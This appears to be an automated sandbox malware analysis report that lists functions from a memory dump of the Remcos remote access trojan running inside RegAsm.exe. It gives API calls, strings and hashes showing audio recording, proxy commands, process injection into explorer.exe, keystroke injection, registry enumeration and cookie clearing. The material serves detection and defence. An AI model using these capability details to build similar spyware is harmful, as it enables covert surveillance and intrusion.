Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5

Uniqueness

Uniqueness Score: -1.00%

Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411514
inet_ntoa.WS2_32(?), ref: 004115AF

Strings

StartReverse, xrefs: 0041167F
GetDirectListeningPort, xrefs: 004116B2
StopReverse, xrefs: 004116A1
NG, xrefs: 0041153A
StartForward, xrefs: 00411673
StopForward, xrefs: 00411690

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-3604713145
Opcode ID: 0a9a7343fc689117693eebfb14ab4dc7e2fa9d8b5310d2697f690439ccc57e51
Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
Opcode Fuzzy Hash: 0a9a7343fc689117693eebfb14ab4dc7e2fa9d8b5310d2697f690439ccc57e51
Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE

Uniqueness

Uniqueness Score: -1.00%

Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27

Strings

log, xrefs: 00455FCD, 00455FD9
asin, xrefs: 00456093
pow, xrefs: 0045600B, 004560B7, 004560CA
acos, xrefs: 0045609F
sqrt, xrefs: 004560AB
exp, xrefs: 00455FEC, 0045604E
log10, xrefs: 00455F71, 00455FC1

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E

Uniqueness

Uniqueness Score: -1.00%

Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

Sleep.KERNEL32(00000064), ref: 00417521
DeleteFileW.KERNEL32(00000000), ref: 00417555

Strings

temp, xrefs: 004174A5
/t , xrefs: 004174D4
\sysinfo.txt, xrefs: 004174A0
open, xrefs: 004174EF
dxdiag, xrefs: 004174EA

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: b4140e7a1e654f8e2f2d8e6583aebb81a0ff97aed1786b4da2f2cc3ddad73d8e
Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
Opcode Fuzzy Hash: b4140e7a1e654f8e2f2d8e6583aebb81a0ff97aed1786b4da2f2cc3ddad73d8e
Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C

Uniqueness

Uniqueness Score: -1.00%

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E

Strings

PEB: %x, xrefs: 004074AF
explorer.exe, xrefs: 00407450, 0040747B
[-] NtAllocateVirtualMemory Error, xrefs: 0040743D
[+] NtAllocateVirtualMemory Success, xrefs: 00407410
windir, xrefs: 004073EA
\explorer.exe, xrefs: 00407400

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D50

Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F

Strings

dMG, xrefs: 00401D81
.wav, xrefs: 00401D69
%Y-%m-%d %H.%M, xrefs: 00401D41
|MG, xrefs: 00401E08

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
API String ID: 3809562944-243156785
Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
int.LIBCPMT ref: 00410E81

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 00410EC1
std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
__CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
__Init_thread_footer.LIBCMT ref: 00410F29

Strings

,kG, xrefs: 00410F04
0kG, xrefs: 00410F31

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID: ,kG$0kG
API String ID: 3815856325-2015055088
Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
waveInStart.WINMM ref: 00401CFE

Strings

|MG, xrefs: 00401C9B
dMG, xrefs: 00401BED
PG, xrefs: 00401C27

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: dMG$|MG$PG
API String ID: 1356121797-532278878
Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476

Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
TranslateMessage.USER32(?), ref: 0041D4E9
DispatchMessageA.USER32 ref: 0041D4F3
GetMessageA.USER32 ref: 0041D500

Strings

Remcos, xrefs: 0041D4B8

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

_memcmp.LIBVCRUNTIME ref: 00445423
_free.LIBCMT ref: 00445494
_free.LIBCMT ref: 004454AD
_free.LIBCMT ref: 004454DF
_free.LIBCMT ref: 004454E8
_free.LIBCMT ref: 004454F4

Strings

C, xrefs: 004452E1

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 00414A46
tcp, xrefs: 00414A73

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
ExitThread.KERNEL32 ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

Strings

NG, xrefs: 00401990
NG, xrefs: 0040190D
XMG, xrefs: 00401902
PkG, xrefs: 00401888

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: PkG$XMG$NG$NG
API String ID: 1649129571-3151166067
Opcode ID: 4a24603f84a25f913644c045de838a4ca80ae345bb1220cced053239135f0e13
Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
Opcode Fuzzy Hash: 4a24603f84a25f913644c045de838a4ca80ae345bb1220cced053239135f0e13
Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E

Uniqueness

Uniqueness Score: -1.00%

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000), ref: 00407A4D
MoveFileW.KERNEL32 ref: 00407A6A
CloseHandle.KERNEL32(00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C), ref: 004199CC
SendInput.USER32(00000001,?,0000001C), ref: 004199ED
SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
SendInput.USER32(00000001,?,0000001C), ref: 00419A21
SendInput.USER32(00000001,?,0000001C), ref: 00419A37
SendInput.USER32(00000001,?,0000001C), ref: 00419A54
SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
SendInput.USER32(00000001,?,0000001C), ref: 00419A8B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97

Uniqueness

Uniqueness Score: -1.00%

Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447679
__freea.LIBCMT ref: 00447723
__freea.LIBCMT ref: 00447741

Part of subcall function 00435E40: _free.LIBCMT ref: 00435E56

Strings

am/pm, xrefs: 004477A4
zD, xrefs: 004479AB
a/p, xrefs: 00447808

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm$zD
API String ID: 2936374016-2723203690
Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B

Strings

[regsplt], xrefs: 00413C17
TG, xrefs: 00413BFD
xUG, xrefs: 00413C46

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$xUG$TG
API String ID: 3554306468-1165877943
Opcode ID: c89703c452742340ff60579caf23f853db4314ddae31bb61f668ab7a5683df1c
Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
Opcode Fuzzy Hash: c89703c452742340ff60579caf23f853db4314ddae31bb61f668ab7a5683df1c
Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 0044B3FE
__fassign.LIBCMT ref: 0044B479
__fassign.LIBCMT ref: 0044B494
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00456D49

Strings

D[E, xrefs: 00456D10
D[E, xrefs: 00456C6D, 00456D5E

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: D[E$D[E
API String ID: 269201875-3695742444
Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D

Uniqueness

Uniqueness Score: -1.00%

Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00413D46

Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

RegCloseKey.ADVAPI32(00000000), ref: 00413EB4

Strings

TG, xrefs: 00413E9A
NG, xrefs: 00413D69
xUG, xrefs: 00413EA6
NG, xrefs: 00413E23

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: xUG$NG$NG$TG
API String ID: 3114080316-2811732169
Opcode ID: 7903062090a5edee9dc75d83e84fcebabe47b6331e40db8456511ab981d8410c
Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
Opcode Fuzzy Hash: 7903062090a5edee9dc75d83e84fcebabe47b6331e40db8456511ab981d8410c
Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E

Uniqueness

Uniqueness Score: -1.00%

Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

_wcslen.LIBCMT ref: 0041B763

Strings

http\shell\open\command, xrefs: 0041B69A
program files (x86)\, xrefs: 0041B75D
8SG, xrefs: 0041B709, 0041B70E
.exe, xrefs: 0041B6B5
program files\, xrefs: 0041B749, 0041B750, 0041B762

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 37874593-122982132
Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
PathFileExistsA.SHLWAPI(?), ref: 0040BF78

Strings

Cookies, xrefs: 0040BEFD
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040BF02
[IE cookies cleared!], xrefs: 0040BFC5, 0040BFEA
[IE cookies not found], xrefs: 0040BF40

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
